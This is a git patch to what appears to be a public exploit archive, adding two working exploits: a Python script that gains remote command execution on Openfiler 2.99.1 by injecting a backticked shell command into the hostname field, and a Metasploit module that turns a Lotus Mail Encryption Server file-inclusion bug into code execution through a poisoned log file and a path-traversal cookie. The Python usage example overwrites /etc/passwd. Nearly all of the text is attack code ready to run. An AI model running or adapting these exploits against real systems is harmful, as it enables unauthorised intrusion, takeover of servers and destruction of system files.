From c0a405fe68488b440b1a58e99620b2ce3a99ab5f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 24 Dec 2014 04:50:12 +0000 Subject: [PATCH] Updated 12_24_2014 --- files.csv | 1 + platforms/hardware/webapps/33247.txt | 47 +++++++++++++- platforms/php/remote/35588.rb | 91 ++++++++++++++++++++++++++++ 3 files changed, 138 insertions(+), 1 deletion(-) create mode 100755 platforms/php/remote/35588.rb diff --git a/files.csv b/files.csv index 0569f7d29..46262adde 100755 --- a/files.csv +++ b/files.csv @@ -32045,3 +32045,4 @@ id,file,description,date,author,platform,type,port 35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80 35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082 +35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000 diff --git a/platforms/hardware/webapps/33247.txt b/platforms/hardware/webapps/33247.txt index 36eb4dbe6..3c97520d7 100755 --- a/platforms/hardware/webapps/33247.txt +++ b/platforms/hardware/webapps/33247.txt @@ -37,4 +37,49 @@ Steps to reproduce / PoC: - <-> PoC Video: https://www.youtube.com/watch?v=NzjB9U_0yLE&feature=youtu.be \ No newline at end of file + <-> PoC Video: https://www.youtube.com/watch?v=NzjB9U_0yLE&feature=youtu.be + +#!/usr/bin/env python +# Exploit Title: Openfiler Remote Code Execution +# Date 21/12/2014 +# Affected Software version: 2.99.1 +# Alerted vendor: 7.5.14 + +# Quick and dirty exploit +# usage: python openfiler_RCE.py +# Author: Dolev Farhi @dolevff + +import sys +import urllib +import urllib2 +import cookielib + +server = 'ip.add.re.ss' +username = 'openfiler' +password = 'password' +timeout = 6 +command = '`' + ' '.join(sys.argv[1:]) + '`' + +if len(sys.argv[1:]) == 0: + print 'Missing argument (command)' + print 'example: python openfilerRCE.py echo > /etc/passwd' + sys.exit(0) + +try: + cj = cookielib.CookieJar() + opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) + login_data = urllib.urlencode({'username' : username, 'password' : password}) + opener.open('https://' + server + ':446/account/login.html', login_data, timeout=timeout) + payload = urllib.urlencode({'hostname' : command,'netconf' : 'Update'}) + url = 'https://%s:446/admin/system.html' % (server) + resp = opener.open(url) + if 'logout.html' in resp.read(): + opener.open('https://' + server + ':446/admin/system.html', payload) + print ('Executed %s :-)' %(command)) + sys.exit(0) +except urllib2.URLError, e: + print 'Error: %s' %(e.reason) + sys.exit(1) +except Exception, e: + print 'Error: possibily invalid credentials, try again.' + sys.exit(1) diff --git a/platforms/php/remote/35588.rb b/platforms/php/remote/35588.rb new file mode 100755 index 000000000..553f8cad0 --- /dev/null +++ b/platforms/php/remote/35588.rb @@ -0,0 +1,91 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::PHPInclude + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Lotus Mail Encryption Server (Protector for Mail) Local File Inclusion', + 'Description' => %q{ + This module exploits a local file inclusion vulnerability in + the Lotus Mail Encryption Server (Protector for Mail Encryption) + administration setup interface. The index.php file uses an unsafe include() + where an unauthenticated remote user may read (traversal) arbitrary file contents. + By abusing a second bug within Lotus, we can inject our payload + into a known location and call it via the LFI to gain remote code execution. + Version 2.1.0.1 Build(88.3.0.1.4323) is known to be vulnerable. + You may need to set DATE in the format YYYY-MM-DD to get this working, + where the remote host and metasploit instance have UTC timezone differences. + }, + 'Author' => [ 'patrick' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://www.osisecurity.com.au/advisories/' ], #0day + #[ 'CVE', 'X' ], + [ 'OSVDB', '87556'], + #[ 'BID', 'X' ], + ], + 'Privileged' => false, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Lotus Mail Encryption Server 2.1.0.1', { }]], + 'DisclosureDate' => 'Nov 9 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(9000), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new("DATE", [false, 'The date of the target system log file in YYYY-MM-DD format']), + ], self.class) + end + + def check + res = send_request_cgi( { 'uri' => '/' }) + if (res.code == 302 && res.body.match(/GetLoginScreen.uevent/)) + return Exploit::CheckCode::Detected + end + return Exploit::CheckCode::Safe + end + + def php_exploit + + logfile = datastore['DATE'] ? datastore['DATE'] : Time.now.strftime("%Y-%m-%d") + if (logfile !~ /\d\d\d\d-\d\d-\d\d/) # if set by user datastore... + print_error("DATE is in incorrect format (use 'YYYY-MM-DD'). Unable to continue.") + return + end + + # set up the initial log file RCE - this is unescaped ascii so we can execute it + # later >:) uid is tomcat so we cannot read apache's logs, and we are stuck inside + # tomcat's php-cgi wrapper which prevents /proc/* injection and a lot of the + # filesystem. example good injected log: '/var/log/ovid/omf-2012-08-01.log' patrick + + inject_url = "/omc/GetSetupScreen.event?setupPage=" # no whitespace + res = send_request_cgi( { 'uri' => inject_url }) + + if (res and res.code == 404 and res.body.match(/Lotus Protector for Mail Encryption - Page Not Found/)) # it returns a 404 but this is good. + vprint_good("Payload injected...") + + response = send_request_cgi( { + 'uri' => '/omc/pme/index.php', + 'cookie' => "slaLANG=../../../../../../var/log/ovid/omf-#{logfile}.log%00;", # discard .php + }) + end + end +end